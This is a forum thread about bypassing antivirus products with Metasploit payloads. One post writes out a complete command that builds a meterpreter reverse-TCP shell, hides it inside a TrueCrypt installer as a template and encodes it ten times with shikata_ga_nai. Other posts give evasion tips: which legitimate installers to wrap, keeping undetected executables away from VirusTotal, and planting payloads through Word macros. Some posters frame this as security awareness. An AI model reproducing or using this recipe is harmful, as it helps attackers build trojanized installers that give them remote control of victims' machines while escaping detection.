Thread: Antivirus bypass

  1. #1
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Antivirus bypass

    Here's a video of a demo I made in response to a post on another site stating that AVG picks up all the payloads. It doesn't!!!

    Bypass AntiVirus

    Please comment.

  2. #2
    Junior Member Focaccia's Avatar
    Join Date
    Jun 2009
    Posts
    63

    Default Re: Antivirus bypass

    "how to bypass AVs, but I don't show you how", that's funny

  3. #3
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: Antivirus bypass

    It was just to show how it can be done, as there is a bit of confusion as to various payloads being picked up by certain AVs. If it can be done, it's not that hard to find out shikata etc., but it matters what exe you use; some have packers that prevent the encoding. Try and see what you come up with. I didn't want the sig all over VirusTotal etc., and as it's a public vid I didn't want misuse of it.

    Thanks for the reply though.

  4. #4
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280

    Default Re: Antivirus bypass

    The encoding scheme was "omitted".
    I think that you used another exe to generate a payload and encoded it with shikata_ga_nai 10x.
    The size of the payload is very large, 3.3 MB.
    Am I wrong?

    Regards

  5. #5
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: Antivirus bypass

    \o/

    Code:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.192 LPORT=5555 R | msfencode -t exe -x /root/Truecrypt_70.exe -o /root/Truecrypt_70_backdoor.exe -e x86/shikata_ga_nai -c 10
    ¬¬"
    (gdb) disass m(y_br)ain


  6. #6
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: Antivirus bypass

    Hehe
    It was never going to stay secret..

    It's a shame you omitted the commands and didn't clarify (although it was obvious) which file was used for the template.
    But I can understand your train of thought on why you did it.

    Must admit that I was a little surprised to see that using the shikata_ga_nai encoder alone worked for the AV bypass; I had only tested smaller Windows executables and had to encode the hell out of them to bypass AV.

    http://www.backtrack-linux.org/forum...r-payload.html

  7. #7
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: Antivirus bypass

    Hi fellas

    Thanks for taking the time to reply. Here's the thing: I posted other videos showing what I have learned and gave step-by-step instructions on everything I did and why, for those outside of the forums, the basic home user etc., to make them aware of these attacks and not just go out and buy a top name AV and then have nothing more to worry about. I have had so many tops come to me with Trojans with bundled software from top names, and the machines are full of bad stuff.

    Now I have had lots of views in the forum and no replies, so I thought I would do this video in the raw, so to speak (and look, I get replies). Also, as it was public on various vid sites, I did not want all and sundry making these payloads. This forum is a place for responsible security issues and findings, so I guess I was being responsible for the one part, and the guys on here who know their stuff and are trustworthy would get the gist of what was carried out in the exploit.

    I have learnt a lot on here, and "Tape", your blog has taught me a lot. Thanks.... Btw I started the AV bypass using your tutorial and modified it from there, so a shout goes out to you my friend....


    I have also made a video on Windows 7 and the Adobe CoolType exploit, as it works and people reckon it doesn't.

    The best way to try them out is to get all the major AV trials, install them on VMs using snapshots and try to evade from there. The main reasons I tried lots of different encoding options were:

    1: My main machine has ESET installed, and that picks up practically everything others do not, so the main goal was to evade that.

    2: The exes have different packing methods, I think, and trial and error ends up with a good exe payload.

    AVG picks up bad file sigs on major exes (Adobe etc.), so I tried a not so common app: the Java installer actually works, and that surprised me, as does the TrueCrypt app. Most payloads work with others, but in this instance AVG picks up a bad file sig as I said, and these apps don't trigger that, so they are 100% on all the majors.

    Please note I'm no expert and don't claim to be, so all advice is most welcome.

    Long post I know, but hey, you deserve an explanation just for replying.

    espreto! You got most of it correct btw.

    Cheers all Pentest09

  8. #8
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: Antivirus bypass

    Well, it looks like this demo ended up getting smashed all over VirusTotal; ESET picks up all of them now. Had this working undetected for nearly 8 months, and 2 weeks after this demo it ends up detected... back to square one....

  9. #9
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: Antivirus bypass

    I have a reverse TCP meterpreter session exe made up that is still very much undetected.
    In fact I have a few, all over 4 months old and still functioning.
    They are all based on what I did in my blog... However, if I were to post the exact method I used, you can bet
    your life it would be checked, tested and checked with VirusTotal and accordingly rendered useless..

    A good lesson learned on your part I would say.

  10. #10
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: Antivirus bypass

    Yeah, it's ok, I just got it past ESET once again, but I find if I use multi-encoding the exe doesn't execute correctly; yeah, won't do that one again... Still having problems trying to inject the payload into macros in a .doc at the moment, any ideas? I get errors: it opens the payload and places it in the target drive, but that's as far as it gets; it doesn't execute the payload. Followed the Met Unleashed version step by step, but using 2007 not 2003, which slightly differs. Thanks for the reply.

    Edit: "but I find if I use multi-encoding the exe doesn't execute correctly": it's ok, got it working, and thanks to this problem, upon resolving it and trying to find a new way, I have in fact tried with 20 AVs in snapshots on VMware, with heuristics, and 100% undetected. So it's all cushteee!!!
    Last edited by pentest09; 09-29-2010 at 11:48 AM.
